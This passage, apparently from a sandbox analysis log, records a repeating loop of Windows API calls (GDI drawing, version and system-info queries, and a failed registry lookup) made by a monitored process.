wProcessorRevision=0x5e03)) [0088.093] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.093] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.093] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.093] BeginPath (hdc=0x0) returned 0 [0088.093] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.093] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.093] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.093] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.093] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.093] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.093] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.093] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401d0 [0088.093] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401cd [0088.093] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e61 [0088.093] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e62 [0088.094] CombineRgn (hrgnDst=0x1040e61, hrgnSrc1=0x4d0401d0, hrgnSrc2=0x4f0401cd, iMode=1) returned 1 [0088.094] CombineRgn (hrgnDst=0x1040e62, hrgnSrc1=0x4d0401d0, hrgnSrc2=0x4f0401cd, iMode=4) returned 2 [0088.094] CreateSolidBrush (color=0xff) returned 0x2100e60 [0088.094] CreateSolidBrush (color=0xff0000) returned 0x1100e63 [0088.094] DeleteObject (ho=0x1100e63) returned 1 [0088.094] DeleteObject (ho=0x4f0401cd) returned 1 [0088.094] DeleteObject (ho=0x4d0401d0) returned 1 [0088.094] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.094] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.094] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.094] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.094] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.094] BeginPath (hdc=0x0) returned 0 [0088.094] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.094] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.094] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.094] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.094] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.094] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.094] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.094] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401cd [0088.094] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401d0 [0088.094] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e64 [0088.094] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e65 [0088.094] CombineRgn (hrgnDst=0x1040e64, hrgnSrc1=0x500401cd, hrgnSrc2=0x4e0401d0, iMode=1) returned 1 [0088.094] CombineRgn (hrgnDst=0x1040e65, hrgnSrc1=0x500401cd, hrgnSrc2=0x4e0401d0, iMode=4) returned 2 [0088.094] CreateSolidBrush (color=0xff) returned 0x2100e63 [0088.094] CreateSolidBrush (color=0xff0000) returned 0x1100e66 [0088.094] DeleteObject (ho=0x1100e66) returned 1 [0088.094] DeleteObject (ho=0x4e0401d0) returned 1 [0088.094] DeleteObject (ho=0x500401cd) returned 1 [0088.094] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.094] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.094] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.094] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.094] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.095] BeginPath (hdc=0x0) returned 0 [0088.095] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.095] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.095] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.095] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.095] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.095] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.095] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.095] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401d0 [0088.095] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401cd [0088.095] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e67 [0088.095] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e68 [0088.095] CombineRgn (hrgnDst=0x1040e67, hrgnSrc1=0x4f0401d0, hrgnSrc2=0x510401cd, iMode=1) returned 1 [0088.095] CombineRgn (hrgnDst=0x1040e68, hrgnSrc1=0x4f0401d0, hrgnSrc2=0x510401cd, iMode=4) returned 2 [0088.095] CreateSolidBrush (color=0xff) returned 0x2100e66 [0088.095] CreateSolidBrush (color=0xff0000) returned 0x1100e69 [0088.095] DeleteObject (ho=0x1100e69) returned 1 [0088.095] DeleteObject (ho=0x510401cd) returned 1 [0088.095] DeleteObject (ho=0x4f0401d0) returned 1 [0088.095] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.095] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.095] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.095] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.095] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.095] BeginPath (hdc=0x0) returned 0 [0088.095] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.095] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.095] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.095] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.095] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.095] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.095] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.096] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401cd [0088.096] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401d0 [0088.096] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6a [0088.096] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6b [0088.096] CombineRgn (hrgnDst=0x1040e6a, hrgnSrc1=0x520401cd, hrgnSrc2=0x500401d0, iMode=1) returned 1 [0088.096] CombineRgn (hrgnDst=0x1040e6b, hrgnSrc1=0x520401cd, hrgnSrc2=0x500401d0, iMode=4) returned 2 [0088.096] CreateSolidBrush (color=0xff) returned 0x2100e69 [0088.096] CreateSolidBrush (color=0xff0000) returned 0x1100e6c [0088.096] DeleteObject (ho=0x1100e6c) returned 1 [0088.096] DeleteObject (ho=0x500401d0) returned 1 [0088.096] DeleteObject (ho=0x520401cd) returned 1 [0088.096] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.096] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.096] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.096] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.096] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.096] BeginPath (hdc=0x0) returned 0 [0088.096] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.096] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.096] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.096] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.096] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.096] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.096] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.096] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401d0 [0088.096] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401cd [0088.096] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6d [0088.096] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6e [0088.096] CombineRgn (hrgnDst=0x1040e6d, hrgnSrc1=0x510401d0, hrgnSrc2=0x530401cd, iMode=1) returned 1 [0088.096] CombineRgn (hrgnDst=0x1040e6e, hrgnSrc1=0x510401d0, hrgnSrc2=0x530401cd, iMode=4) returned 2 [0088.096] CreateSolidBrush (color=0xff) returned 0x2100e6c [0088.096] CreateSolidBrush (color=0xff0000) returned 0x1100e6f [0088.096] DeleteObject (ho=0x1100e6f) returned 1 [0088.096] DeleteObject (ho=0x530401cd) returned 1 [0088.096] DeleteObject (ho=0x510401d0) returned 1 [0088.096] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.097] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.097] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.097] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.097] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.097] BeginPath (hdc=0x0) returned 0 [0088.097] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.097] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.097] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.097] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.097] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.097] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.097] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.097] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.097] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401cd [0088.097] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401d0 [0088.097] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e70 [0088.097] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e71 [0088.097] CombineRgn (hrgnDst=0x1040e70, hrgnSrc1=0x540401cd, hrgnSrc2=0x520401d0, iMode=1) returned 1 [0088.097] CombineRgn (hrgnDst=0x1040e71, hrgnSrc1=0x540401cd, hrgnSrc2=0x520401d0, iMode=4) returned 2 [0088.097] CreateSolidBrush (color=0xff) returned 0x2100e6f [0088.097] CreateSolidBrush (color=0xff0000) returned 0x1100e72 [0088.097] DeleteObject (ho=0x1100e72) returned 1 [0088.097] DeleteObject (ho=0x520401d0) returned 1 [0088.097] DeleteObject (ho=0x540401cd) returned 1 [0088.097] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.097] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.097] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.097] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.097] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.097] BeginPath (hdc=0x0) returned 0 [0088.097] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.097] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.097] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.097] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.097] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.097] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.098] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.098] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.098] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401d0 [0088.098] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401cd [0088.098] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e73 [0088.098] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e74 [0088.098] CombineRgn (hrgnDst=0x1040e73, hrgnSrc1=0x530401d0, hrgnSrc2=0x550401cd, iMode=1) returned 1 [0088.098] CombineRgn (hrgnDst=0x1040e74, hrgnSrc1=0x530401d0, hrgnSrc2=0x550401cd, iMode=4) returned 2 [0088.098] CreateSolidBrush (color=0xff) returned 0x2100e72 [0088.098] CreateSolidBrush (color=0xff0000) returned 0x1100e75 [0088.098] DeleteObject (ho=0x1100e75) returned 1 [0088.098] DeleteObject (ho=0x550401cd) returned 1 [0088.098] DeleteObject (ho=0x530401d0) returned 1 [0088.098] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.098] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.098] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.098] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.098] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.098] BeginPath (hdc=0x0) returned 0 [0088.098] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.098] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.098] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.098] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.098] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.098] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.098] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.098] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.098] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401cd [0088.098] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401d0 [0088.098] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e76 [0088.098] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e77 [0088.098] CombineRgn (hrgnDst=0x1040e76, hrgnSrc1=0x560401cd, hrgnSrc2=0x540401d0, iMode=1) returned 1 [0088.098] CombineRgn (hrgnDst=0x1040e77, hrgnSrc1=0x560401cd, hrgnSrc2=0x540401d0, iMode=4) returned 2 [0088.098] CreateSolidBrush (color=0xff) returned 0x2100e75 [0088.099] CreateSolidBrush (color=0xff0000) returned 0x1100e78 [0088.099] DeleteObject (ho=0x1100e78) returned 1 [0088.099] DeleteObject (ho=0x540401d0) returned 1 [0088.099] DeleteObject (ho=0x560401cd) returned 1 [0088.099] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.099] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.099] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.099] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.099] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.099] BeginPath (hdc=0x0) returned 0 [0088.099] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.099] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.099] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.099] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.099] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.099] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.099] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.099] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.099] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401d0 [0088.099] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401cd [0088.099] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e79 [0088.099] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e7a [0088.099] CombineRgn (hrgnDst=0x1040e79, hrgnSrc1=0x550401d0, hrgnSrc2=0x570401cd, iMode=1) returned 1 [0088.099] CombineRgn (hrgnDst=0x1040e7a, hrgnSrc1=0x550401d0, hrgnSrc2=0x570401cd, iMode=4) returned 2 [0088.099] CreateSolidBrush (color=0xff) returned 0x2100e78 [0088.099] CreateSolidBrush (color=0xff0000) returned 0x1100e7b [0088.099] DeleteObject (ho=0x1100e7b) returned 1 [0088.099] DeleteObject (ho=0x570401cd) returned 1 [0088.099] DeleteObject (ho=0x550401d0) returned 1 [0088.099] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.099] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.100] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.100] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.100] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.100] BeginPath (hdc=0x0) returned 0 [0088.100] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.100] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.100] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.100] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.100] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.100] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.100] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.100] 